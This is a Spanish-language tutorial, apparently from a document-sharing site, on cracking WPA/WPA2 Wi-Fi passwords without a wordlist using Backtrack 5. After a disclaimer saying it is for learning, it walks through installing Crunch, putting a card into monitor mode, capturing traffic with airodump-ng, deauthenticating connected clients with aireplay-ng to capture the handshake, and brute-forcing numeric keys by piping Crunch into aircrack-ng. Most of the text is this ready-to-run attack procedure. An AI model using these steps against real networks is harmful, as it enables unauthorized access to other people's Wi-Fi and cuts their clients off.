You are on page 1of 4

Auditoras Backtrack 5: Crackear claves WPA/WPA2 sin

diccionario
Estos tutoriales tienen como objetivo mostrar las vulnerabilidades de las redes wifi, para
que se creen contraseas ms seguras, en ningn momento se quiere incitar a obtener
claves de puntos wi-fi de los que no se es propietario. Lo que los usuarios decidan hacer
tras leer este tutorial es por su propia voluntad, si utilizas estos tutoriales para obtener
claves ilegalmente, lo haces bajo tu propia responsabilidad.
En el ltimo tutorial os explicaba como crackear claves WPA y WPA2utilizando
diccionarios. Haz click aqu si quieres verlo. Os deca que el uso de diccionarios para
obtener las contraseas por fuerza bruta era un poco pesado ya que era bastante
improbable tener la palabra y que la mayora de las claves tienen slo nmeros.
Bien, para evitar tener que descargar pesados diccionarios os ensear comocrackear
claves WPA y WPA2 sin utilizar diccionarios, para ello utilizaremos
Crunch. Primero aprenderemos a instalar el Crunch y posteriormente, partiremos del
anterior tutorial y unicamente cambiaremos el ltimo paso para no tener que usar
diccionarios, si no usar Crunch.
Primero instalaremos Crunch, de la forma ms sencilla que he encontrado ya que hay veces
que la cosa se complica. Se puede instalar tanto en Backtrack como en la mayora de
distribuciones yo os lo explicar para Backtrack partiendo de que lo tenis funcionando. Si
no sabis instalarlo haced click aqu.

Primero descargaremos Crunch (click aqu para descargar).


Despus vamos a la carpeta donde se ha descargado y hacemos click derecho y abrir en un
terminal. Cuando se abra el terminal teclearemos:

tar -xvzf crunch-3.3.tgz


Entramos en el directorio donde se acaba de descomprimir escribiendo:

cd crunch-3.3
Vamos a la carpeta y abrimos el archivo MakeFile para donde pone:

val:
crunch.c @echo Building valgrind compatible binary
$(CC) $(VCFLAGS) $(LFS) $? -o crunch

Cambiar la ltima lnea por:

$(CC) $? $(VCFLAGS) $(LFS) -o crunch


Y en donde pone:

crunch: crunch.c

@echo Building binary


$(CC) $(CFLAGS) $(LFS) $? -o $@
Cambiar la ltima lnea por:

$(CC) $? $(CFLAGS) $(LFS) -o $@


Guardamos y nuevamente en el terminal escribiremos:

make install
Para copiarlo en el sbin haciendo as:

cp crunch /usr/sbin/
Ya tenemos el Crunch instalado y ahora copiar y pegar el tutorial anterior que
tambin lo podis ver haciendo click aqu.
Para empezar lo que tenemos que hacer es abrir un nuevo terminal e iniciar el modo
monitor de nuestra tarjeta de red. Para ello escribiremos:

airmon-ng start (interface que queremos poner en modo


monitor)
Una vez echo esto, procederemos a analizar las redes wifi, escrimibos:

airodump-ng (interface que hemos puesto en modo monitor)

Ahora elegimos la red wifi y procedemos a copiar su direccin mac. Una vez echo esto
pararemos el proceso (ctrl+c) y escribiremos:

airodump-ng -w (nombre que le queremos poner al archivo) -c


(canal que utiliza la red) --bssid (mac de la red que estamos
atacando) y por ltimo aadiremos la interface que estamos
usando.

Ahora estamos escaneando la red, hasta aqu ha sido igual que para las claves wep, a partir
de ahora cambia. Primero necesitaremos capturar el Handshake, que es un archivo que
manda el ordenador con la contrasea al router para que este acepte la conexin. Podemos
esperar a que un cliente se conecte, o si no, si hay algn cliente conectado, procederemos a
su desautentificacin para que se desconecte y al volverse a conectar capturemos su
Handshake. Para ello, sin cerrar esa terminal, en una nueva teclearemos:

aireplay-ng -0 00 (00 es el numero de veces que queremos que


se intente desautentificar, con 50 suele llegar) -a (mac del
router) -c (mac del cliente que est conectado, aparece justo
debajo de donde pone station) (interface que estamos usando).

Probablemente despus de eso en la primera pantalla en la parte de arriba cuando el cliente


se vuelva a conectar aparecer: WPA handshake: (mac de la red que atamos). Si no
es as repetiremos el paso anterior y aumentaremos el nmero de veces que mandamos la
desautentificacin.

Como veis todo es lo mismo que en el paso anterior excepto este ltimo que en vez de usar
el diccionario escribiremos:

crunch 8 9 0123456789 | aircrack-ng -a 2 RUTA-DEL-ARCHIVO-CAP


-e default -b HANDSHAKE -w
Donde: 8 9 es el nmero de cifras que tiene la contrasea y 0123456789 son las cifras que
tiene que probar. Tendris que cambiar los huecos en maysculas por vuestros datos.

Espero que os sirva y que est bien entendido. Recomiendo leer los otros tutoriales para
entender a la perfeccin todo el proceso:

You might also like